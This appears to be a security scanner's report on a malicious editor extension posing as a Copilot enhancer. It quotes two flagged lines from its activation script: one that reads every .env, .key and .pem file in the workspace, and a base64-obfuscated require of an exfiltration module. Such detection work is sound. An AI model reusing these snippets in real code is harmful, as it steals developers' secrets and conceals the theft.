ICUICU
critical

vscode-copilot-enhancer

v1.5.0

Enhance GitHub Copilot suggestions with custom rules

npmcursor-extFirst seen Jan 2, 202606758e207f9a7469...

2

Total

1

Critical

1

High

0

Medium

Findings

extension/activate.js
criticalDE-005Data ExfiltrationLine 18

Uploads workspace files to external server on activation

const secrets = glob.sync('**/*.{env,key,pem}').map(f => fs.readFileSync(f, 'utf8'));
Report false positive
highOB-003ObfuscationLine 5

Dynamic import conceals malicious module

const exfil = require(Buffer.from('Li4vZXhmaWw=', 'base64').toString());
Report false positive